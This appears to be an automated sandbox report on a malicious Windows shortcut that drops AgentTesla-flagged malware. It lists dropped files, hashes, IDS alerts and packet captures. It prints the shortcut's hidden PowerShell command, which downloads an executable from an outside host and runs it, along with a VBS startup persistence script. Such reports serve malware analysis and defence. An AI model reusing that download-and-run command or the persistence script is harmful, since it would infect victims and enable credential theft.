                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................1b.....P.)....Q.....y.....i.......}...N......d.....`.....m.....g....Rich............PE..L....%O..........#..................e....... ....@...........................................@.......@.........................T.................................................................................... ..D............................text............................... ..`.rdata....... ......................@..@.data...X........h..................@....rsrc................T..............@..@........................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\flexuoseness

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\file.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):255488
                                                                      Entropy (8bit):6.393938792111984
                                                                      Encrypted:false
                                                                      SSDEEP:6144:doyZbDFiQod72ZcwXA3S1kxC4qrseWDHg19G6AU4ZH:dTxi72aNC1yqIPwbAU4h
                                                                      MD5:074728216283AD6FA8777C82DFBB55DE
                                                                      SHA1:92DF63CBAB81835463BA54F6791BD6A2944646A9
                                                                      SHA-256:D63FB30628DC1C5DAB8172821C1A68765ACF307C695732A3BF8111095EB177BB
                                                                      SHA-512:260C4965D0AD3DAC2E2F35F05EDEF93B8F9581830F7F00ADC73413C05C01E4864B4D5BC7A6A6E7B53C3022ABBA60A5DC524F43ED5BD096D203ABD7191C493900
                                                                      Malicious:false
                                                                      Preview:...ZDSK4\J4X..ZG.K4XJ4XS.ZGSK4XJ4XSIZGSK4XJ4XSIZGSK4XJ4XSIZG.K4XD+.]I.N.j.Y..y.!34s;F7-F9>i9&=%[,jV=s;/)s"Zx.{.s$5#6e9U@.XSIZGSKd.J4.RJZ;.yRXJ4XSIZG.K6YA5SSI.DSK<XJ4XSI$.PK4xJ4XSMZGS.4Xj4XSKZGWK4XJ4XSMZGSK4XJ4.WIZESK4XJ4ZS..GS[4XZ4XSIJGS[4XJ4XSYZGSK4XJ4XSIv.PK{XJ4XSMZ.VK4XJ4XSIZGSK4XJ4XSIzCSG4XJ4XSIZGSK4XJ4XSIZGSK4XJ4XSIZGSK4XJ4XSIZGSK4XJ4XSIZgSK<XJ4XSIZGSK4Pj4X.IZGSK4XJ4XSg."+?4XJ..PIZgSK4.I4XQIZGSK4XJ4XSIZGsK48dF+!*ZGS.1XJ4XWIZASK4.I4XSIZGSK4XJ4X.IZ.}9Q4%WXSEZGSK.\J4ZSIZ.PK4XJ4XSIZGSK4.J4.SIZGSK4XJ4XSIZGS+.[J4XSI.GSK6XO4..KZ..J4[J4XRIZASK4XJ4XSIZGSK4XJ4XSIZGSK4XJ4XSIZGSK4XJ4XSIZGSK4XW....m.If@V_.o. .H..Y..*..H.^.#^....W...mA^..Z.\{..=...2.C1!K.....3@EV"g/|F;.N....y'...U%."...-{.)Uo.q..uj....;,.l..=..0$Yv+D(?,t.2-U*#.Z.HZGSK........+.nuI;Fg["....~& ....54XJPXSI(GSKUXJ4.SIZ(SK46J4X-IZG-K4X.4XS.ZGS|4XJ.XSI7GSK.XJ4&SIZ..D;...1 .GSK4X...c.7...k.}....+.-.V`..7....Ng.E\.$.....:._..^.,Uhz.M5^WLX@WH8eD....{EWO1ZM0[_tT....y...p..:..g".5ZGSK4X.4X.IZG..4.J4X.I.G..4XJ..S.Z.S..J

                                                                      C:\Users\user\AppData\Local\unspattered\recomplaint.exe

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\file.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):1305263
                                                                      Entropy (8bit):7.126088648073379
                                                                      Encrypted:false
                                                                      SSDEEP:24576:SRmJkcoQricOIQxiZY1iabicPx38FUk+0:HJZoQrbTFZY1iabXMakz
                                                                      MD5:AA6F514A7AFA81E26BCF612923EA483C
                                                                      SHA1:2033A141125D0A0989EF3C0002833BACF0A390C7
                                                                      SHA-256:997C285947AE58D2ACFB5C0B32ADFA7288168FAA5AA691D094F5FFD9A9728A3A
                                                                      SHA-512:F8D0475754589E9D57462AC8A13820132714FF682A8655E1CA95D037FB2E65F62815A79AF855B4E2707CF9CB5A9EE35E262CBA4D277B90AD823BCFE4D1D5D335
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................1b.....P.)....Q.....y.....i.......}...N......d.....`.....m.....g....Rich............PE..L....%O..........#..................e....... ....@...........................................@.......@.........................T.................................................................................... ..D............................text............................... ..`.rdata....... ......................@..@.data...X........h..................@....rsrc................T..............@..@........................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\746c438e21160650.customDestinations-ms (copy)

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):5407
                                                                      Entropy (8bit):3.5105508922189017
                                                                      Encrypted:false
                                                                      SSDEEP:48:NHuNdDkWDa0+/EIlHJwSogZo2U+/EIlLwSogZoi1:NHYBD+/EI5HM+/EIfHp
                                                                      MD5:1ECEC74ABDE16C2B31F1F016C69C67C4
                                                                      SHA1:1A436EADC904F0D94A2FD835214950177844EF05
                                                                      SHA-256:53F06443F7B7EDDF2D9668C2649E57B1AFDAA1D538E5DC6DFF9D53427E4C8A4B
                                                                      SHA-512:FED88A983F4D51213417F47BF7633BD938481231EA2CC614E4F7E4A385FD2C8B2C6F199D231758B81046315A005BF06FE13A3D7A2DE10E8B67B297D19C7FCFAB
                                                                      Malicious:false
                                                                      Preview:...................................FL..................F.`.. ...,...W....|......K...................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........S....!..W....|.........2.....;Y.D .RTGS-W~1.LNK..f......EW.5;Y.D..........................3...R.T.G.S.-.W.B.-.A.B.S.-.2.4.0.7.3.0.-.N.E.W...l.n.k.......c...............-.......b...........k.......C:\Users\user\Desktop\RTGS-WB-ABS-240730-NEW.lnk../.C.:.\.U.s.e.r.s.\.a.d.m.i.n.\.D.e.s.k.t.o.p.\.p.u.r.c.h.a.s._.g.e.o._.N.J.F._.i.c.o.n...i.c.o.........%SystemDrive%\Users\admin\Desktop\purchas_geo_NJF_icon.ico..........................................................................................................................................................................................................%.S.y.s.t.e.m.D.r.i.v.e.%.\.U.s.e.r.s.\.a.d.m.i.n.\.D.e.s.k.t.o.p.\.p.u.r.c.h.a.s._.g.e.o._.N.J.F._.i.c.o.n...i.c.o..................................................................................................

                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\G43DTOBPZAS7WZLARAO3.temp

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):5407
                                                                      Entropy (8bit):3.5105508922189017
                                                                      Encrypted:false
                                                                      SSDEEP:48:NHuNdDkWDa0+/EIlHJwSogZo2U+/EIlLwSogZoi1:NHYBD+/EI5HM+/EIfHp
                                                                      MD5:1ECEC74ABDE16C2B31F1F016C69C67C4
                                                                      SHA1:1A436EADC904F0D94A2FD835214950177844EF05
                                                                      SHA-256:53F06443F7B7EDDF2D9668C2649E57B1AFDAA1D538E5DC6DFF9D53427E4C8A4B
                                                                      SHA-512:FED88A983F4D51213417F47BF7633BD938481231EA2CC614E4F7E4A385FD2C8B2C6F199D231758B81046315A005BF06FE13A3D7A2DE10E8B67B297D19C7FCFAB
                                                                      Malicious:false
                                                                      Preview:...................................FL..................F.`.. ...,...W....|......K...................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........S....!..W....|.........2.....;Y.D .RTGS-W~1.LNK..f......EW.5;Y.D..........................3...R.T.G.S.-.W.B.-.A.B.S.-.2.4.0.7.3.0.-.N.E.W...l.n.k.......c...............-.......b...........k.......C:\Users\user\Desktop\RTGS-WB-ABS-240730-NEW.lnk../.C.:.\.U.s.e.r.s.\.a.d.m.i.n.\.D.e.s.k.t.o.p.\.p.u.r.c.h.a.s._.g.e.o._.N.J.F._.i.c.o.n...i.c.o.........%SystemDrive%\Users\admin\Desktop\purchas_geo_NJF_icon.ico..........................................................................................................................................................................................................%.S.y.s.t.e.m.D.r.i.v.e.%.\.U.s.e.r.s.\.a.d.m.i.n.\.D.e.s.k.t.o.p.\.p.u.r.c.h.a.s._.g.e.o._.N.J.F._.i.c.o.n...i.c.o..................................................................................................

                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\recomplaint.vbs

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\unspattered\recomplaint.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):292
                                                                      Entropy (8bit):3.387474353478796
                                                                      Encrypted:false
                                                                      SSDEEP:6:DMM8lfm3OOQdUfclzXUEZ+lX1QlAWB7TilSmlAnriIM8lfQVn:DsO+vNlDQ1Ql17WlGmA2n
                                                                      MD5:E6A749EDB8A34D16433880A6AC1257FF
                                                                      SHA1:C98E85B1E9B6003C942C57555AC3C576863A51F9
                                                                      SHA-256:2B56E40B8D7D32AB500654F51B793F38AAE90A3DD24050E9094A0AA2DF84FE87
                                                                      SHA-512:96D078951A716466D26F76FEC2CBFE47B32FB0F4CEEE5157F83D2CB60D56B8395DD3E12F4CB24340CAB99C8E33C87AFE644D935E77791E882F8073842DA5084F
                                                                      Malicious:true
                                                                      Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.u.n.s.p.a.t.t.e.r.e.d.\.r.e.c.o.m.p.l.a.i.n.t...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

                                                                      C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:modified
                                                                      Size (bytes):45984
                                                                      Entropy (8bit):6.16795797263964
                                                                      Encrypted:false
                                                                      SSDEEP:768:4BbSoy+SdIBf0k2dsjYg6Iq8S1GYqWH8BR:noOIBf0ddsjY/ZGyc7
                                                                      MD5:9D352BC46709F0CB5EC974633A0C3C94
                                                                      SHA1:1969771B2F022F9A86D77AC4D4D239BECDF08D07
                                                                      SHA-256:2C1EEB7097023C784C2BD040A2005A5070ED6F3A4ABF13929377A9E39FAB1390
                                                                      SHA-512:13C714244EC56BEEB202279E4109D59C2A43C3CF29F90A374A751C04FD472B45228CA5A0178F41109ED863DBD34E0879E4A21F5E38AE3D89559C57E6BE990A9B
                                                                      Malicious:false
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      Joe Sandbox View:
                                                                      • Filename: shipping documents.exe, Detection: malicious, Browse
                                                                      • Filename: shipping documents.exe, Detection: malicious, Browse
                                                                      • Filename: autorization Letter.exe, Detection: malicious, Browse
                                                                      • Filename: rMT103SwiftCopyoFPayment.exe, Detection: malicious, Browse
                                                                      • Filename: Shipping Document.exe, Detection: malicious, Browse
                                                                      • Filename: COMMERCAIL INVOICE AND TNT AWB TRACKING INVOICE.exe, Detection: malicious, Browse
                                                                      • Filename: DHL- CBJ520818836689.pdf.exe, Detection: malicious, Browse
                                                                      • Filename: DHL- CBJ520818836689.exe, Detection: malicious, Browse
                                                                      • Filename: Shipping documents.exe, Detection: malicious, Browse
                                                                      • Filename: Shipping doc.exe, Detection: malicious, Browse
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0..d..........V.... ........@.. ..............................s.....`.....................................O.......8............r...A.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...

                                                                      \Device\ConDrv

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1141
                                                                      Entropy (8bit):4.442398121585593
                                                                      Encrypted:false
                                                                      SSDEEP:24:zKLXkhDObntKlglUEnfQtvNuNpKOK5aM9YJC:zKL0hDQntKKH1MqJC
                                                                      MD5:6FB4D27A716A8851BC0505666E7C7A10
                                                                      SHA1:AD2A232C6E709223532C4D1AB892303273D8C814
                                                                      SHA-256:1DC36F296CE49BDF1D560B527DB06E1E9791C10263459A67EACE706C6DDCDEAE
                                                                      SHA-512:3192095C68C6B7AD94212B7BCA0563F2058BCE00C0C439B90F0E96EA2F029A37C2F2B69487591B494C1BA54697FE891E214582E392127CB8C90AB682E0D81ADB
                                                                      Malicious:false
                                                                      Preview:Microsoft (R) .NET Framework Services Installation Utility Version 4.8.4084.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c

                                                                      Static File Info

                                                                      General

                                                                      File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Sun Nov 17 02:57:57 2019, mtime=Sun Nov 17 02:57:57 2019, atime=Wed Oct 29 01:16:41 2014, length=478720, window=hide
                                                                      Entropy (8bit):3.5372984242646197
                                                                      TrID:
                                                                      • Windows Shortcut (20020/1) 100.00%
                                                                      File name:RTGS-WB-ABS-240730-NEW.lnk
                                                                      File size:2'332 bytes
                                                                      MD5:82937aae96fa6a40b59703eea97ce1ef
                                                                      SHA1:d23b17711e2e65609c9973d6f03dde3d2acb3568
                                                                      SHA256:d820d9f270915fc81bedefd16bf7b8a20cb88a4d1e55d8566b9367fa494ac356
                                                                      SHA512:f3d66ad7d89da4bd494f173506ced0fe46404a786876e4664658e0db4b8075a18e0579f4bb5319aba9dee9338b1f64782a2b3f1f4d7640187b4dfbc0d3240bc8
                                                                      SSDEEP:24:8WU+RuRgkkCtvtUhKBUW1vvAlPWkp+/CWIiAGfcC7KTuUMkWU5T10lDkiO+I10lC:8WU+hgltqlnrWKTuHwADkixD3a33F
                                                                      TLSH:8841AE042BF55B24F7B3AFB9A8B962029933BC49DE119F8F0190C5465C61A14E864F3B
                                                                      File Content Preview:L..................F.@.. ...r..2....r..2.......`.....N...........................P.O. .:i.....+00.../C:\...................V.1......Yl...Windows.@........C.l.Yl.....).........................W.i.n.d.o.w.s.....Z.1......Y....System32..B........C.l.Y......7.

                                                                      File Icon

                                                                      Icon Hash:74f0e4e4e4e1e1ed

                                                                      Static Windows Shortcut Info

                                                                      General

                                                                      Relative Path:..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Command Line Argument:-windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile %TEMP%\file.exe; Start-Process '%TEMP%\file.exe' }"
                                                                      Icon location:C:\Users\admin\Desktop\purchas_geo_NJF_icon.ico

                                                                      Network Behavior

                                                                      Suricata IDS Alerts

                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2024-09-27T10:38:56.228125+02002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.660913208.91.198.176587TCP
                                                                      2024-09-27T10:39:33.684199+02002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.661255208.91.198.176587TCP
                                                                      2024-09-27T10:39:47.577844+02002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.660905208.91.198.176587TCP
                                                                      2024-09-27T10:39:50.515013+02002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.660912208.91.198.176587TCP

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Sep 27, 2024 10:39:11.091875076 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:11.091902971 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:11.091976881 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:11.116990089 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:11.117005110 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.285877943 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.286026955 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:12.288933039 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:12.288945913 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.289294958 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.297359943 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:12.339407921 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.654134989 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.654175043 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.654195070 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.654293060 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:12.654311895 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.654364109 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:12.656210899 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.656239986 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.656341076 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:12.656349897 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.696841002 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:12.779190063 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.779221058 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.779316902 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:12.779333115 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.779402971 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:12.780539989 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.780560970 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.780611992 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:12.780625105 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.780670881 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:12.782221079 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.782278061 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.782311916 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:12.782320976 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.782347918 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:12.782365084 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:12.783751011 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.783777952 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.783834934 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:12.783847094 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.783869028 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:12.783885956 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:12.910696983 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.910739899 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.910794973 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:12.910809040 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.910856009 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:12.910975933 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.910999060 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.911025047 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:12.911031961 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.911046982 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:12.911071062 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:12.911710024 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.911732912 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.911760092 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:12.911768913 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.911792994 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:12.911809921 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:12.912791967 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.912815094 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.912851095 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:12.912859917 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.912883997 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:12.912899017 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:12.913661003 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.913685083 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.913723946 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:12.913732052 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.913767099 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:12.913775921 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:12.913841009 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.913860083 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.913904905 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:12.913911104 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.913934946 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:12.913952112 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:12.926640987 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:12.997401953 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.997438908 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.997561932 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:12.997575998 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:12.997621059 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.029598951 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.029630899 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.029803991 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.029820919 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.029865026 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.030236006 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.030258894 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.030296087 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.030304909 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.030347109 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.030366898 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.030746937 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.030770063 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.030797005 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.030806065 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.030823946 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.030849934 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.032787085 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.032813072 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.032849073 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.032855034 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.032871962 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.032886982 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.033023119 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.033046007 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.033086061 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.033092976 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.033118010 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.033137083 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.033260107 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.033279896 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.033310890 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.033318996 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.033341885 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.033351898 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.033914089 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.034723043 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.034746885 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.034785032 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.034791946 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.034818888 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.034826994 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.044645071 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.091686010 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.091741085 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.091789007 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.091799021 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.091834068 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.091847897 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.124298096 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.124321938 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.124366999 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.124375105 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.124402046 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.124432087 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.125009060 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.125025034 CEST44361245176.99.3.36192.168.2.6
